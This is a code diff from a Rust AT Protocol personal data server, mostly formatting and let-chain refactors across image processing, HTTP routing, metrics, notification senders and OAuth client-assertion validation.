··· 90 90 self 91 91 } 92 92 93 - pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> { 93 + pub fn process( 94 + &self, 95 + data: &[u8], 96 + mime_type: &str, 97 + ) -> Result<ImageProcessingResult, ImageError> { 94 98 if data.len() > self.max_file_size { 95 99 return Err(ImageError::FileTooLarge { 96 100 size: data.len(), ··· 107 111 }); 108 112 } 109 113 let original = self.encode_image(&img)?; 110 - let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) { 114 + let thumbnail_feed = if self.generate_thumbnails 115 + && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) 116 + { 111 117 Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?) 112 118 } else { 113 119 None 114 120 }; 115 - let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) { 121 + let thumbnail_full = if self.generate_thumbnails 122 + && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) 123 + { 116 124 Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?) 117 125 } else { 118 126 None ··· 183 191 }) 184 192 } 185 193 186 - fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> { 194 + fn generate_thumbnail( 195 + &self, 196 + img: &DynamicImage, 197 + max_size: u32, 198 + ) -> Result<ProcessedImage, ImageError> { 187 199 let (orig_width, orig_height) = (img.width(), img.height()); 188 200 let (new_width, new_height) = if orig_width > orig_height { 189 201 let ratio = max_size as f64 / orig_width as f64; ··· 204 216 } 205 217 206 218 pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> { 207 - let format = image::guess_format(data) 208 - .map_err(|e| ImageError::DecodeError(e.to_string()))?; 219 + let format = 220 + image::guess_format(data).map_err(|e| ImageError::DecodeError(e.to_string()))?; 209 221 let cursor = Cursor::new(data); 210 222 let img = ImageReader::with_format(cursor, format) 211 223 .decode() ··· 224 236 fn create_test_image(width: u32, height: u32) -> Vec<u8> { 225 237 let img = DynamicImage::new_rgb8(width, height); 226 238 let mut buf = Vec::new(); 227 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 239 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 240 + .unwrap(); 228 241 buf 229 242 } 230 243
+39 -43
src/lib.rs
··· 109 109 "/xrpc/com.atproto.sync.getLatestCommit", 110 110 get(sync::get_latest_commit), 111 111 ) 112 - .route( 113 - "/xrpc/com.atproto.sync.listRepos", 114 - get(sync::list_repos), 115 - ) 116 - .route( 117 - "/xrpc/com.atproto.sync.getBlob", 118 - get(sync::get_blob), 119 - ) 120 - .route( 121 - "/xrpc/com.atproto.sync.listBlobs", 122 - get(sync::list_blobs), 123 - ) 112 + .route("/xrpc/com.atproto.sync.listRepos", get(sync::list_repos)) 113 + .route("/xrpc/com.atproto.sync.getBlob", get(sync::get_blob)) 114 + .route("/xrpc/com.atproto.sync.listBlobs", get(sync::list_blobs)) 124 115 .route( 125 116 "/xrpc/com.atproto.sync.getRepoStatus", 126 117 get(sync::get_repo_status), ··· 145 136 "/xrpc/com.atproto.sync.requestCrawl", 146 137 post(sync::request_crawl), 147 138 ) 148 - .route( 149 - "/xrpc/com.atproto.sync.getBlocks", 150 - get(sync::get_blocks), 151 - ) 152 - .route( 153 - "/xrpc/com.atproto.sync.getRepo", 154 - get(sync::get_repo), 155 - ) 156 - .route( 157 - "/xrpc/com.atproto.sync.getRecord", 158 - get(sync::get_record), 159 - ) 139 + .route("/xrpc/com.atproto.sync.getBlocks", get(sync::get_blocks)) 140 + .route("/xrpc/com.atproto.sync.getRepo", get(sync::get_repo)) 141 + .route("/xrpc/com.atproto.sync.getRecord", get(sync::get_record)) 160 142 .route( 161 143 "/xrpc/com.atproto.sync.subscribeRepos", 162 144 get(sync::subscribe_repos), 163 145 ) 164 - .route( 165 - "/xrpc/com.atproto.sync.getHead", 166 - get(sync::get_head), 167 - ) 146 + .route("/xrpc/com.atproto.sync.getHead", get(sync::get_head)) 168 147 .route( 169 148 "/xrpc/com.atproto.sync.getCheckout", 170 149 get(sync::get_checkout), ··· 349 328 "/xrpc/app.bsky.feed.getPostThread", 350 329 get(api::feed::get_post_thread), 351 330 ) 352 - .route( 353 - "/xrpc/app.bsky.feed.getFeed", 354 - get(api::feed::get_feed), 355 - ) 331 + .route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed)) 356 332 .route( 357 333 "/xrpc/app.bsky.notification.registerPush", 358 334 post(api::notification::register_push), 359 335 ) 360 336 .route("/.well-known/did.json", get(api::identity::well_known_did)) 361 - .route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did)) 337 + .route( 338 + "/.well-known/atproto-did", 339 + get(api::identity::well_known_atproto_did), 340 + ) 362 341 .route("/u/{handle}/did.json", get(api::identity::user_did_doc)) 363 342 .route( 364 343 "/.well-known/oauth-protected-resource", ··· 375 354 ) 376 355 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 377 356 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 378 - .route("/oauth/authorize/select", post(oauth::endpoints::authorize_select)) 379 - .route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get)) 380 - .route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post)) 381 - .route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny)) 357 + .route( 358 + "/oauth/authorize/select", 359 + post(oauth::endpoints::authorize_select), 360 + ) 361 + .route( 362 + "/oauth/authorize/2fa", 363 + get(oauth::endpoints::authorize_2fa_get), 364 + ) 365 + .route( 366 + "/oauth/authorize/2fa", 367 + post(oauth::endpoints::authorize_2fa_post), 368 + ) 369 + .route( 370 + "/oauth/authorize/deny", 371 + post(oauth::endpoints::authorize_deny), 372 + ) 382 373 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 383 374 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 384 - .route("/oauth/introspect", post(oauth::endpoints::introspect_token)) 375 + .route( 376 + "/oauth/introspect", 377 + post(oauth::endpoints::introspect_token), 378 + ) 385 379 .route( 386 380 "/xrpc/com.atproto.temp.checkSignupQueue", 387 381 get(api::temp::check_signup_queue), ··· 404 398 ) 405 399 .with_state(state); 406 400 407 - let frontend_dir = std::env::var("FRONTEND_DIR") 408 - .unwrap_or_else(|_| "./frontend/dist".to_string()); 401 + let frontend_dir = 402 + std::env::var("FRONTEND_DIR").unwrap_or_else(|_| "./frontend/dist".to_string()); 409 403 410 - if std::path::Path::new(&frontend_dir).join("index.html").exists() { 404 + if std::path::Path::new(&frontend_dir) 405 + .join("index.html") 406 + .exists() 407 + { 411 408 let index_path = format!("{}/index.html", frontend_dir); 412 - let serve_dir = ServeDir::new(&frontend_dir) 413 - .not_found_service(ServeFile::new(index_path)); 409 + let serve_dir = ServeDir::new(&frontend_dir).not_found_service(ServeFile::new(index_path)); 414 410 router.fallback_service(serve_dir) 415 411 } else { 416 412 router
+9 -3
src/main.rs
··· 1 1 use bspds::crawlers::{Crawlers, start_crawlers_service}; 2 - use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender}; 2 + use bspds::notifications::{ 3 + DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender, 4 + }; 3 5 use bspds::state::AppState; 4 6 use std::net::SocketAddr; 5 7 use std::process::ExitCode; ··· 94 96 95 97 let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() { 96 98 let crawlers = Arc::new( 97 - crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()) 99 + crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()), 98 100 ); 99 101 let firehose_rx = state.firehose_tx.subscribe(); 100 102 info!("Crawlers notification service enabled"); 101 - Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx))) 103 + Some(tokio::spawn(start_crawlers_service( 104 + crawlers, 105 + firehose_rx, 106 + shutdown_rx, 107 + ))) 102 108 } else { 103 109 warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)"); 104 110 None
+9 -12
src/metrics.rs
··· 24 24 } 25 25 26 26 fn describe_metrics() { 27 - metrics::describe_counter!( 28 - "bspds_http_requests_total", 29 - "Total number of HTTP requests" 30 - ); 27 + metrics::describe_counter!("bspds_http_requests_total", "Total number of HTTP requests"); 31 28 metrics::describe_histogram!( 32 29 "bspds_http_request_duration_seconds", 33 30 "HTTP request duration in seconds" ··· 64 61 "bspds_rate_limit_rejections_total", 65 62 "Total number of rate limit rejections" 66 63 ); 67 - metrics::describe_counter!( 68 - "bspds_db_queries_total", 69 - "Total number of database queries" 70 - ); 64 + metrics::describe_counter!("bspds_db_queries_total", "Total number of database queries"); 71 65 metrics::describe_histogram!( 72 66 "bspds_db_query_duration_seconds", 73 67 "Database query duration in seconds" ··· 78 72 match PROMETHEUS_HANDLE.get() { 79 73 Some(handle) => { 80 74 let metrics = handle.render(); 81 - (StatusCode::OK, [("content-type", "text/plain; version=0.0.4")], metrics) 75 + ( 76 + StatusCode::OK, 77 + [("content-type", "text/plain; version=0.0.4")], 78 + metrics, 79 + ) 82 80 } 83 81 None => ( 84 82 StatusCode::INTERNAL_SERVER_ERROR, ··· 117 115 } 118 116 119 117 fn normalize_path(path: &str) -> String { 120 - if path.starts_with("/xrpc/") { 121 - if let Some(method) = path.strip_prefix("/xrpc/") { 118 + if path.starts_with("/xrpc/") 119 + && let Some(method) = path.strip_prefix("/xrpc/") { 122 120 if let Some(q) = method.find('?') { 123 121 return format!("/xrpc/{}", &method[..q]); 124 122 } 125 123 return path.to_string(); 126 124 } 127 - } 128 125 129 126 if path.starts_with("/u/") && path.ends_with("/did.json") { 130 127 return "/u/{handle}/did.json".to_string();
+3 -3
src/notifications/mod.rs
··· 8 8 }; 9 9 10 10 pub use service::{ 11 - channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update, 12 - enqueue_email_verification, enqueue_notification, enqueue_password_reset, 13 - enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService, 11 + NotificationService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion, 12 + enqueue_email_update, enqueue_email_verification, enqueue_notification, enqueue_password_reset, 13 + enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, 14 14 }; 15 15 16 16 pub use types::{
+14 -19
src/notifications/sender.rs
··· 80 80 Self { 81 81 from_address, 82 82 from_name, 83 - sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()), 83 + sendmail_path: std::env::var("SENDMAIL_PATH") 84 + .unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()), 84 85 } 85 86 } 86 87 ··· 91 92 } 92 93 93 94 pub fn format_email(&self, notification: &QueuedNotification) -> String { 94 - let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 95 + let subject = 96 + sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 95 97 let recipient = sanitize_header_value(&notification.recipient); 96 98 let from_header = if self.from_name.is_empty() { 97 99 self.from_address.clone() 98 100 } else { 99 - format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address) 101 + format!( 102 + "{} <{}>", 103 + sanitize_header_value(&self.from_name), 104 + self.from_address 105 + ) 100 106 }; 101 107 format!( 102 108 "From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}", 103 - from_header, 104 - recipient, 105 - subject, 106 - notification.body 109 + from_header, recipient, subject, notification.body 107 110 ) 108 111 } 109 112 } ··· 195 198 Err(e) => { 196 199 if e.is_timeout() { 197 200 if attempt < MAX_RETRIES - 1 { 198 - last_error = Some(format!("Discord request timed out")); 201 + last_error = Some("Discord request timed out".to_string()); 199 202 retry_delay(attempt).await; 200 203 continue; 201 204 } ··· 243 246 let chat_id = &notification.recipient; 244 247 let subject = notification.subject.as_deref().unwrap_or("Notification"); 245 248 let text = format!("*{}*\n\n{}", subject, notification.body); 246 - let url = format!( 247 - "https://api.telegram.org/bot{}/sendMessage", 248 - self.bot_token 249 - ); 249 + let url = format!("https://api.telegram.org/bot{}/sendMessage", self.bot_token); 250 250 let payload = json!({ 251 251 "chat_id": chat_id, 252 252 "text": text, ··· 254 254 }); 255 255 let mut last_error = None; 256 256 for attempt in 0..MAX_RETRIES { 257 - let result = self 258 - .http_client 259 - .post(&url) 260 - .json(&payload) 261 - .send() 262 - .await; 257 + let result = self.http_client.post(&url).json(&payload).send().await; 263 258 match result { 264 259 Ok(response) => { 265 260 if response.status().is_success() { ··· 280 275 Err(e) => { 281 276 if e.is_timeout() { 282 277 if attempt < MAX_RETRIES - 1 { 283 - last_error = Some(format!("Telegram request timed out")); 278 + last_error = Some("Telegram request timed out".to_string()); 284 279 retry_delay(attempt).await; 285 280 continue; 286 281 }
+7 -2
src/notifications/service.rs
··· 80 80 81 81 pub async fn run(self, mut shutdown: watch::Receiver<bool>) { 82 82 if self.senders.is_empty() { 83 - warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured."); 83 + warn!( 84 + "Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured." 85 + ); 84 86 } 85 87 info!( 86 88 poll_interval_secs = self.poll_interval.as_secs(), ··· 231 233 } 232 234 } 233 235 234 - pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 236 + pub async fn enqueue_notification( 237 + db: &PgPool, 238 + notification: NewNotification, 239 + ) -> Result<Uuid, sqlx::Error> { 235 240 sqlx::query_scalar!( 236 241 r#" 237 242 INSERT INTO notification_queue
+117 -80
src/oauth/client.rs
··· 88 88 89 89 fn is_loopback_client(client_id: &str) -> bool { 90 90 if let Ok(url) = reqwest::Url::parse(client_id) { 91 - url.scheme() == "http" 92 - && url.host_str() == Some("localhost") 93 - && url.port().is_none() 91 + url.scheme() == "http" && url.host_str() == Some("localhost") && url.port().is_none() 94 92 } else { 95 93 false 96 94 } 97 95 } 98 96 99 97 fn build_loopback_metadata(client_id: &str) -> Result<ClientMetadata, OAuthError> { 100 - let url = reqwest::Url::parse(client_id).map_err(|_| { 101 - OAuthError::InvalidClient("Invalid loopback client_id URL".to_string()) 102 - })?; 98 + let url = reqwest::Url::parse(client_id) 99 + .map_err(|_| OAuthError::InvalidClient("Invalid loopback client_id URL".to_string()))?; 103 100 let mut redirect_uris = Vec::new(); 104 101 for (key, value) in url.query_pairs() { 105 102 if key == "redirect_uri" { ··· 117 114 client_uri: None, 118 115 logo_uri: None, 119 116 redirect_uris, 120 - grant_types: vec!["authorization_code".to_string(), "refresh_token".to_string()], 117 + grant_types: vec![ 118 + "authorization_code".to_string(), 119 + "refresh_token".to_string(), 120 + ], 121 121 response_types: vec!["code".to_string()], 122 122 scope, 123 123 token_endpoint_auth_method: Some("none".to_string()), ··· 134 134 } 135 135 { 136 136 let cache = self.cache.read().await; 137 - if let Some(cached) = cache.get(client_id) { 138 - if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 137 + if let Some(cached) = cache.get(client_id) 138 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 139 139 return Ok(cached.metadata.clone()); 140 140 } 141 - } 142 141 } 143 142 let metadata = self.fetch_metadata(client_id).await?; 144 143 { ··· 154 153 Ok(metadata) 155 154 } 156 155 157 - pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> { 156 + pub async fn get_jwks( 157 + &self, 158 + metadata: &ClientMetadata, 159 + ) -> Result<serde_json::Value, OAuthError> { 158 160 if let Some(jwks) = &metadata.jwks { 159 161 return Ok(jwks.clone()); 160 162 } ··· 165 167 })?; 166 168 { 167 169 let cache = self.jwks_cache.read().await; 168 - if let Some(cached) = cache.get(jwks_uri) { 169 - if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 170 + if let Some(cached) = cache.get(jwks_uri) 171 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 170 172 return Ok(cached.jwks.clone()); 171 173 } 172 - } 173 174 } 174 175 let jwks = self.fetch_jwks(jwks_uri).await?; 175 176 { ··· 186 187 } 187 188 188 189 async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> { 189 - if !jwks_uri.starts_with("https://") { 190 - if !jwks_uri.starts_with("http://") 191 - || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1")) 190 + if !jwks_uri.starts_with("https://") 191 + && (!jwks_uri.starts_with("http://") 192 + || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))) 192 193 { 193 194 return Err(OAuthError::InvalidClient( 194 195 "jwks_uri must use https (except for localhost)".to_string(), 195 196 )); 196 197 } 197 - } 198 198 let response = self 199 199 .http_client 200 200 .get(jwks_uri) ··· 242 242 .header("Accept", "application/json") 243 243 .send() 244 244 .await 245 - .map_err(|e| OAuthError::InvalidClient(format!("Failed to fetch client metadata: {}", e)))?; 245 + .map_err(|e| { 246 + OAuthError::InvalidClient(format!("Failed to fetch client metadata: {}", e)) 247 + })?; 246 248 if !response.status().is_success() { 247 249 return Err(OAuthError::InvalidClient(format!( 248 250 "Failed to fetch client metadata: HTTP {}", 249 251 response.status() 250 252 ))); 251 253 } 252 - let mut metadata: ClientMetadata = response 253 - .json() 254 - .await 255 - .map_err(|e| OAuthError::InvalidClient(format!("Invalid client metadata JSON: {}", e)))?; 254 + let mut metadata: ClientMetadata = response.json().await.map_err(|e| { 255 + OAuthError::InvalidClient(format!("Invalid client metadata JSON: {}", e)) 256 + })?; 256 257 if metadata.client_id.is_empty() { 257 258 metadata.client_id = client_id.to_string(); 258 259 } else if metadata.client_id != client_id { ··· 274 275 self.validate_redirect_uri_format(uri)?; 275 276 } 276 277 if !metadata.grant_types.is_empty() 277 - && !metadata.grant_types.contains(&"authorization_code".to_string()) 278 + && !metadata 279 + .grant_types 280 + .contains(&"authorization_code".to_string()) 278 281 { 279 282 return Err(OAuthError::InvalidClient( 280 283 "authorization_code grant type is required".to_string(), ··· 298 301 if metadata.redirect_uris.contains(&redirect_uri.to_string()) { 299 302 return Ok(()); 300 303 } 301 - if Self::is_loopback_client(&metadata.client_id) { 302 - if let Ok(req_url) = reqwest::Url::parse(redirect_uri) { 304 + if Self::is_loopback_client(&metadata.client_id) 305 + && let Ok(req_url) = reqwest::Url::parse(redirect_uri) { 303 306 let req_host = req_url.host_str().unwrap_or(""); 304 307 let is_loopback_redirect = req_url.scheme() == "http" 305 308 && (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]"); ··· 319 322 } 320 323 } 321 324 } 322 - } 323 325 Err(OAuthError::InvalidRequest( 324 326 "redirect_uri not registered for client".to_string(), 325 327 )) ··· 331 333 "redirect_uri must not contain a fragment".to_string(), 332 334 )); 333 335 } 334 - let parsed = reqwest::Url::parse(uri).map_err(|_| { 335 - OAuthError::InvalidClient(format!("Invalid redirect_uri: {}", uri)) 336 - })?; 336 + let parsed = reqwest::Url::parse(uri) 337 + .map_err(|_| OAuthError::InvalidClient(format!("Invalid redirect_uri: {}", uri)))?; 337 338 let scheme = parsed.scheme(); 338 339 if scheme == "http" { 339 340 let host = parsed.host_str().unwrap_or(""); ··· 343 344 )); 344 345 } 345 346 } else if scheme == "https" { 346 - } else if scheme.chars().all(|c| c.is_ascii_lowercase() || c.is_ascii_digit() || c == '+' || c == '.' || c == '-') { 347 - if !scheme.chars().next().map(|c| c.is_ascii_lowercase()).unwrap_or(false) { 347 + } else if scheme.chars().all(|c| { 348 + c.is_ascii_lowercase() || c.is_ascii_digit() || c == '+' || c == '.' || c == '-' 349 + }) { 350 + if !scheme 351 + .chars() 352 + .next() 353 + .map(|c| c.is_ascii_lowercase()) 354 + .unwrap_or(false) 355 + { 348 356 return Err(OAuthError::InvalidClient(format!( 349 357 "Invalid redirect_uri scheme: {}", 350 358 scheme ··· 366 374 } 367 375 368 376 pub fn auth_method(&self) -> &str { 369 - self.token_endpoint_auth_method 370 - .as_deref() 371 - .unwrap_or("none") 377 + self.token_endpoint_auth_method.as_deref().unwrap_or("none") 372 378 } 373 379 } 374 380 ··· 411 417 metadata: &ClientMetadata, 412 418 client_assertion: &str, 413 419 ) -> Result<(), OAuthError> { 414 - use base64::{Engine as _, engine::general_purpose::{URL_SAFE_NO_PAD, STANDARD}}; 420 + use base64::{ 421 + Engine as _, 422 + engine::general_purpose::{STANDARD, URL_SAFE_NO_PAD}, 423 + }; 415 424 let parts: Vec<&str> = client_assertion.split('.').collect(); 416 425 if parts.len() != 3 { 417 - return Err(OAuthError::InvalidClient("Invalid client_assertion format".to_string())); 426 + return Err(OAuthError::InvalidClient( 427 + "Invalid client_assertion format".to_string(), 428 + )); 418 429 } 419 430 let header_bytes = URL_SAFE_NO_PAD 420 431 .decode(parts[0]) ··· 422 433 .map_err(|_| OAuthError::InvalidClient("Invalid assertion header encoding".to_string()))?; 423 434 let header: serde_json::Value = serde_json::from_slice(&header_bytes) 424 435 .map_err(|_| OAuthError::InvalidClient("Invalid assertion header JSON".to_string()))?; 425 - let alg = header.get("alg").and_then(|a| a.as_str()).ok_or_else(|| { 426 - OAuthError::InvalidClient("Missing alg in client_assertion".to_string()) 427 - })?; 428 - if !matches!(alg, "ES256" | "ES384" | "RS256" | "RS384" | "RS512" | "EdDSA") { 436 + let alg = header 437 + .get("alg") 438 + .and_then(|a| a.as_str()) 439 + .ok_or_else(|| OAuthError::InvalidClient("Missing alg in client_assertion".to_string()))?; 440 + if !matches!( 441 + alg, 442 + "ES256" | "ES384" | "RS256" | "RS384" | "RS512" | "EdDSA" 443 + ) { 429 444 return Err(OAuthError::InvalidClient(format!( 430 445 "Unsupported client_assertion algorithm: {}", 431 446 alg ··· 441 456 })?; 442 457 let payload: serde_json::Value = serde_json::from_slice(&payload_bytes) 443 458 .map_err(|_| OAuthError::InvalidClient("Invalid assertion payload JSON".to_string()))?; 444 - let iss = payload.get("iss").and_then(|i| i.as_str()).ok_or_else(|| { 445 - OAuthError::InvalidClient("Missing iss in client_assertion".to_string()) 446 - })?; 459 + let iss = payload 460 + .get("iss") 461 + .and_then(|i| i.as_str()) 462 + .ok_or_else(|| OAuthError::InvalidClient("Missing iss in client_assertion".to_string()))?; 447 463 if iss != metadata.client_id { 448 464 return Err(OAuthError::InvalidClient( 449 465 "client_assertion iss does not match client_id".to_string(), 450 466 )); 451 467 } 452 - let sub = payload.get("sub").and_then(|s| s.as_str()).ok_or_else(|| { 453 - OAuthError::InvalidClient("Missing sub in client_assertion".to_string()) 454 - })?; 468 + let sub = payload 469 + .get("sub") 470 + .and_then(|s| s.as_str()) 471 + .ok_or_else(|| OAuthError::InvalidClient("Missing sub in client_assertion".to_string()))?; 455 472 if sub != metadata.client_id { 456 473 return Err(OAuthError::InvalidClient( 457 474 "client_assertion sub does not match client_id".to_string(), ··· 462 479 let iat = payload.get("iat").and_then(|i| i.as_i64()); 463 480 if let Some(exp) = exp { 464 481 if exp < now { 465 - return Err(OAuthError::InvalidClient("client_assertion has expired".to_string())); 482 + return Err(OAuthError::InvalidClient( 483 + "client_assertion has expired".to_string(), 484 + )); 466 485 } 467 486 } else if let Some(iat) = iat { 468 487 let max_age_secs = 300; 469 488 if now - iat > max_age_secs { 470 - tracing::warn!(iat = iat, now = now, "client_assertion too old (no exp, using iat)"); 471 - return Err(OAuthError::InvalidClient("client_assertion is too old".to_string())); 489 + tracing::warn!( 490 + iat = iat, 491 + now = now, 492 + "client_assertion too old (no exp, using iat)" 493 + ); 494 + return Err(OAuthError::InvalidClient( 495 + "client_assertion is too old".to_string(), 496 + )); 472 497 } 473 498 } else { 474 499 return Err(OAuthError::InvalidClient( 475 500 "client_assertion must have exp or iat claim".to_string(), 476 501 )); 477 502 } 478 - if let Some(iat) = iat { 479 - if iat > now + 60 { 503 + if let Some(iat) = iat 504 + && iat > now + 60 { 480 505 return Err(OAuthError::InvalidClient( 481 506 "client_assertion iat is in the future".to_string(), 482 507 )); 483 508 } 484 - } 485 509 let jwks = cache.get_jwks(metadata).await?; 486 - let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| { 487 - OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string()) 488 - })?; 510 + let keys = jwks 511 + .get("keys") 512 + .and_then(|k| k.as_array()) 513 + .ok_or_else(|| OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string()))?; 489 514 let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid { 490 515 keys.iter() 491 516 .filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid)) ··· 532 557 signature: &[u8], 533 558 ) -> Result<(), OAuthError> { 534 559 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 535 - use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier}; 536 560 use p256::EncodedPoint; 537 - let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 538 - OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()) 539 - })?; 540 - let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| { 541 - OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()) 542 - })?; 543 - let x_bytes = URL_SAFE_NO_PAD.decode(x) 561 + use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier}; 562 + let x = key 563 + .get("x") 564 + .and_then(|v| v.as_str()) 565 + .ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?; 566 + let y = key 567 + .get("y") 568 + .and_then(|v| v.as_str()) 569 + .ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?; 570 + let x_bytes = URL_SAFE_NO_PAD 571 + .decode(x) 544 572 .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?; 545 - let y_bytes = URL_SAFE_NO_PAD.decode(y) 573 + let y_bytes = URL_SAFE_NO_PAD 574 + .decode(y) 546 575 .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?; 547 576 let mut point_bytes = vec![0x04]; 548 577 point_bytes.extend_from_slice(&x_bytes); ··· 564 593 signature: &[u8], 565 594 ) -> Result<(), OAuthError> { 566 595 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 596 + use p384::EncodedPoint; 567 597 use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier}; 568 - use p384::EncodedPoint; 569 - let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 570 - OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()) 571 - })?; 572 - let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| { 573 - OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()) 574 - })?; 575 - let x_bytes = URL_SAFE_NO_PAD.decode(x) 598 + let x = key 599 + .get("x") 600 + .and_then(|v| v.as_str()) 601 + .ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?; 602 + let y = key 603 + .get("y") 604 + .and_then(|v| v.as_str()) 605 + .ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?; 606 + let x_bytes = URL_SAFE_NO_PAD 607 + .decode(x) 576 608 .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?; 577 - let y_bytes = URL_SAFE_NO_PAD.decode(y) 609 + let y_bytes = URL_SAFE_NO_PAD 610 + .decode(y) 578 611 .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?; 579 612 let mut point_bytes = vec![0x04]; 580 613 point_bytes.extend_from_slice(&x_bytes); ··· 615 648 crv 616 649 ))); 617 650 } 618 - let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 619 - OAuthError::InvalidClient("Missing x in OKP key".to_string()) 620 - })?; 621 - let x_bytes = URL_SAFE_NO_PAD.decode(x) 651 + let x = key 652 + .get("x") 653 + .and_then(|v| v.as_str()) 654 + .ok_or_else(|| OAuthError::InvalidClient("Missing x in OKP key".to_string()))?; 655 + let x_bytes = URL_SAFE_NO_PAD 656 + .decode(x) 622 657 .map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?; 623 - let key_bytes: [u8; 32] = x_bytes.try_into() 658 + let key_bytes: [u8; 32] = x_bytes 659 + .try_into() 624 660 .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?; 625 661 let verifying_key = VerifyingKey::from_bytes(&key_bytes) 626 662 .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?; 627 - let sig_bytes: [u8; 64] = signature.try_into() 663 + let sig_bytes: [u8; 64] = signature 664 + .try_into() 628 665 .map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?; 629 666 let sig = Signature::from_bytes(&sig_bytes); 630 667 verifying_key
+1 -1
src/oauth/db/client.rs
··· 1 - use sqlx::PgPool; 2 1 use super::super::{AuthorizedClientData, OAuthError}; 3 2 use super::helpers::{from_json, to_json}; 3 + use sqlx::PgPool; 4 4 5 5 pub async fn upsert_authorized_client( 6 6 pool: &PgPool,
+2 -5
src/oauth/db/device.rs
